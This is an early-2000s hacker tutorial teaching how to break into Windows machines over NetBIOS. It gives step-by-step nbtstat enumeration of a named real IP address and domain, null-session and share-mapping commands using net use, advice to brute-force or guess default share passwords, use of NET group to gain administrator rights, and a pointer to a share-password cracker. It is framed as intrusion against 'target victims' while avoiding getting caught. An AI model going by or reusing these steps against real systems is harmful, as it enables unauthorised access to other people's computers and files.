In depth Guide Too Hacking Windows Using NetBIOS

By: C0ldPhaTe

Introduction:
It has been brought to my attention that many people don’t understand the way NetBIOS works. Many
don’t even know where to begin when it comes to hacking NetBIOS. So in this tutorial I’m going to cover
the basics of hacking NetBIOS, I will also remind you hacking with NetBIOS is almost the easiest way to
hack remotely. Although it might be one of the most easiest way to hack remotely you will find that
hacking with NetBIOS has a lot of powerful uses also.

The Network Basic Input Output System (NetBIOS):

The Network Basic Input Output System is also known as NetBIOS. NetBIOS was originally developed by
IBM, which used Sytek as an Application Programming Interface (API) for the client software operation
systems. These systems included Windows98, Windows Me, Windows NT.

The Network Neighborhood:

Many of you have seen the icon labeled “Network Neighborhood” but a lot of upcoming hackers also
known as newbies might not know exactly how to use the Network Neighborhood or understand how it
works. The Network Neighborhood is used to access the computers attached to your network. After you
have click on the icon to the Network Neighborhood your computer then tries to get all the names of the
computers attached to your network. Issuing a command known as NetBIOS does this. The NetBIOS
command is used to give various information on computers connected to a network. But before you can
move onto any of this you will first have to start from the basics, which I have included below. From there
you can the attack your target.

Information Gathering And Server Penetration:

The first step you would do while looking for a target victim is to portscan the target machines or network.
One thing to keep in mind is when you’re hacking a Windows NT system or network. NetBIOS tends to be
the target of the bruteforce attack. The reason for this is because Information gathering with NetBIOS is
fairly easy to do. The thing to keep in mind is if the Port Scanner returns that your target machine or
network has port 139 open you can simple query that system with using simple commands which I will go
into a little later with this tutorial.

What Is the NBTSTAT Command:

The NBTSTAT command is a very powerful command, which allows you to manually interact with
NetBIOS. To use this command you will first have to launch the MS-DOS Command Prompt, for those of
you who don’t know how to launch this you can do so by going to your Start Button and clicking on it then
slide your mouse over the run button and type in Command in the run prompt and it will automatically
launch the MS-DOS Prompt.

The NBTSTAT Command Options:

The Below display is the display that you would get if you went into the MS DOS Prompt and typed
c:\windows\nbtstat/? You would then get the below reading which gives you a basic breakdown of what
you will be able to do or what you could do with the NBTSTAT command. I know it’s a little hard to read
the table below with any real knowledge of what that table means so I’m actually going to walk you
through a real hack so you can get a little understanding on how you would go about actually go about
using the information your gather. Ok now onto the more fun and useful information .
Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP).
NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n][-r] [-R] [-s] [S] [interval] ]

NBTSTAT -a (adapter status) Lists the remote machine's name table given its name
NBTSTAT -A (Adapter status) Lists the remote machine's name table given its IP address.
NBTSTAT -c (cache) Lists the remote name cache including the IP addresses
NBTSTAT -n (names) Lists local NetBIOS names.
NBTSTAT -r (resolved) Lists names resolved by broadcast and via WINS
NBTSTAT -R (Reload) Purges and reloads the remote cache name table
NBTSTAT -S (Sessions) Lists sessions table with the destination IP addresses
NBTSTAT -s (sessions) Lists sessions table converting destination IP addresses to host names.

RemoteName - Remote host machine name. IP address Dotted decimal representation of the IP address.
Interval - Redisplays selected statistics, pausing interval seconds between each display.

The column headings which are generated by using the NBTSTAT command have the following meanings:

Input – Number of bytes received

Output – Number of bytes sent
In/Out – Whether the connection is from your target computer is outbound or from another system to your
local network, which is known as, inbound.
Life – The remaining time that a name table caches will so called live.
Local Name – This is what is known as your local NetBIOS name given to your connection.
Remote Host – The name or the Internet Protocol (IP) given to the address of the remote host.

Actually Using The NBTSTAT Command:

Ok Now I will begin to show you how to use the NBTSTAT command this is an example later on in the
tutorial I will give you a step by step break down on everything from gaining the target information to
actually hacking into using The NBSTAT Command. Now remember this is an actual machine of which
has port 139 open and allows File Sharing the domain is known as Http://www.intrixsoftware.com now I
will begin the process of making my way into the system.

Example On How To Use the NBTSTAT Command:

C:\WINDOWS>NBTSTAT –a 66.94.35.10

NetBIOS Remote Machine Name Table

Name Type Status

--------------------------------------------------------------------------
SETI2 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
SETI2 <20> UNIQUE Registered
INet~Services <1C> GROUP Registered
SETI2 <03> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
IS~SETI2....... <00> UNIQUE Registered
WORKGROUP <1D> UNIQUE Registered

MAC Address = 00-10-DC-5F-F2-E6

Important Note: If you don’t get a read out with the number <20> showing. This means that the target
victum has enabled the File Sharing and Print Sharing. Also another thing you might get is the “Host Not
Found” This shows that either port 139 is a closed connection or that the Internet Protocol (IP) doesn’t
exist.

Now from the information we have gathered from the NBTSTAT command you can proceed to either
continue on hacking or you could use the other information for such as connection hijacking, MAC
spoofing etc. This information is rather important while continuing on in your hack but before you can do
anything else you going to need to know a little about what you just read, so below I have broke down the
NetBIOS Remote Machine Name Table.

Breakdown Of The NetBIOS Remote Machine Name Table:

Before you can go any further you will need to know a little information about how to read the NetBIOS
Remote Machine Name Table. Understanding the list below is key to gaining access to a target machine
running

Name Number Type Usage

---------------------------------------------------------------------------------------------------------------------------------
<computername> 00 Unique Workstation Service
<computername> 01 Unique Messanger Service
<\\_MSBROWSE_> 01 Group Master Browser
<computername> 03 Unique Messenger Service
<computername> 06 Unique RAS Server Service
<computername> 1F Unique NetDDE Service
<computername> 20 Unique File Server Service
<computername> 21 Unique RAS Client Service
<computername> 22 Unique Exchange Interchange
<computername> 23 Unique Exchange Store
<computername> 24 Unique Exchange Directory
<computername> 30 Unique Modem Sharing Server Service
<computername> 31 Unique Modem Sharing Client Service
<computername> 43 Unique SMS Client Remote Control
<computername> 44 Unique SMS Admin Remote Control
<computername> 45 Unique SMS Client Remote Chat
<computername> 46 Unique SMS Client Remote Transfer
<computername> 4C Unique DES Pathworks TCPIP Service
<computername> 52 Unique DES Pathworks TCPIP Service
<computername> 87 Unique Exchange MTA
<computername> 6A Unique Exchange IMC
<computername> BE Unique Network Monitor Agent
<computername> BF Unique Network Monitor Applications
<username> 03 Unique Messenger Service
<domain> 00 Group Domain Name
<domain> 1B Unique Domain Master Browser
<domain> 1C Group Domain Controllers
<domain> 1D Unique Master Browser
<domain> 1E Group Browser Service Elections
<Inet~Services> 1C Group Internet Information Server
<IS~Computer_name> 00 Unique Internet Information Server
<computername> 2B Unique Lotus Notes Server
---------------------------------------------------------------------------------------------------------------------------------

Now that you have seen the complete NetBIOS Remote Machine Table in full I will now tell you how to
actually go about reading the table and understanding exactly what the table says. Below you going to find
a complete listing and definitions to each listing so please keep this table and listing handy because it will
play a big part in your hacker journeys.
NetBIOS Remote Machine Name Table Definitions:

Unique - Anything with the name unique may only have one Internet Protocol (IP) address assigned to it.
Group - A normal group, this allows a single name to exist with many Internet Protocols.
Domain Name – New in Microsoft Windows NT 4.0
Internet Group – A special configuration of the group names.

Now what you do from the received output is up to you, but most hackers would glean possible usernames
from the remote machine or remote machines. Which this will now lead me on to another think known as
NET command.

Using NetBIOS Shares:

After you have found a NetBIOS share you will then proceed to add it to your LMHOSTS file. After you
add this to your LMHOSTS file you will be able to view the remote computer within your Network
Neighborhood. If you don’t add it to your LMHOSTS file you will not be able to view the computer
remotely. After adding it to your LMHOSTS file you can simply use the find computer options within
Windows NT and Windows 95,98 to browse the shares. You could also use the alternation option to use the
very powerful NET.exe

C:\>net view 66.94.35.10

C:\>net view \\SETI2

Shared Resources At 66.94.35.10

Share Name Type Used As Comment

----------------------------------------------------------------------------------------------------------------
NETLOGON DISK Logon Server Share
SETI2 DISK
TEST DISK

Note: You will often find shares like the C$, ADMIN$ and IPC$ share hidden and will most of the time not
be shown. Below is a listing of shares you might come across and should be familiar with. A lot of times
you will find that these shares are indeed password protected so you might have to try and Brute Force
attack the password or your might get lucky and find that the password is a default password which was
sent with the machine. If your asking yourself how do I know the default passwords search the web for
“Default NetBIOS passwords” and you should be rather pleased with your outcome.

Below a listing of Shares and there uses:

Share Name Type Comment

--------------------------------------------------------------
ADMIN$ DISK Remote Admin
C$ DISK Default Share
IPC$ IPC: Remote IPC
NETLOGON DISK Logon Server Share
Test DISK

I will now connect to the IPC$ share on 66.94.35.10 using a Null Session.

C:\net use \\66.94.35.10\ipc$ “” /user:””

The command completed successfully
I will now connect to a normal share using the Net use command. Which can then be used to have remote
access to drive in which I place in the command.

C:\net use x: \\ 66.94.35.10\test

The command completed successfully.

C:\net use
New connections will be remembered.

Status Local Remote Network

------------------------------------------------------------------------------------------------------
OK X: \\ 66.94.35.10 Microsoft Windows Network
OK B: \\ a 66.94.35.10 Microsoft Windows Network
The command completed successfully.

I mentioned above about the NET.exe and how powerful it actually was well I will now tell you some
interesting but yet very useful while your hacking into a machine to know. With the understanding of these
commands and how they work will make the process of gaining administrative writes a whole lot easier.

What NET.exe Is Good For:

Below you will find out just what NET.exe can be used for I have included a listing of things its capable of
and a definition of what each command does.

NET name - This will show the current name of the computer and who is currently logged in.
NET accounts – Will show the password restricted users.
NET share – Displays all shares on the local machine.
NET user – Will show accounts created on the local machine.
NET group – Can be used to add people to the Administrative group.

How To Crack Share Passwords:

You might remember me saying above about finding shares that are password protected on your target
machine. For cracking passwords on Windows 95,98,Me, XP you can use a password cracker known as
“PQWAK” this can be found on any web page that deals with password crackers. PQWAK is decrypting a
share password within usually a minuet or so. The only bad thing is that PQWAK can only crack the
remote passwords of the remote operating system its running on.

Conclusion:
Well I hope you have learned a little bit about hacking with NetBIOS. Although hacking NetBIOS is one of
the most easiest ways to hack into a system it is also a very powerful way to take over a system. I would
also recommend downloading some text files or buying some books on Windows NT, Windows 2000 or
hacking web servers. Remember it’s always smarter to read information before acting. The more
knowledgeable you are about your target operating system the less likely you are to make a false move,
which will get your ass caught. I’m not claming to be “l33t”, as most people would consider themselves.
You will see a lot of people say the are but you will find very few who really are. Also don’t be ashamed if
you go into a channel and someone makes fun of you for asking a question. We all have gone through it
just don’t get discouraged, just blow them off and continue to read up on anything you can get your hands
on. If you have any questions you can find me within Mirc or you can contact me through the information
provided below. Also be sure to download my other tutorials.

MIRC: irc.dal.net #h4ckerz, #crystalz, #hackalot, #Hackfest, #Hack-i, #Hacku, #minangcrew,

#Hack0r,#hack.exe,#localhost
E.Mail: gbrooks@mcintoshstudent.com
AOL IM: Myst1kal One

Other Documents I Have Written:

In depth Guide Too Hacking Windows Using NetBIOS – February 7, 2003
A complete users guide to port scanning – February 06, 2003
A Quick Unix Command Guide – January 30, 2003
A Definitive Trojan Port Listing – January 30, 2003
Basics On How To Identify A Firewall – January 23, 2003
The Common Gateway Interface (CGI) – November 28, 2002
Microsoft IIS Unicode Exploit Explained - November 13, 2002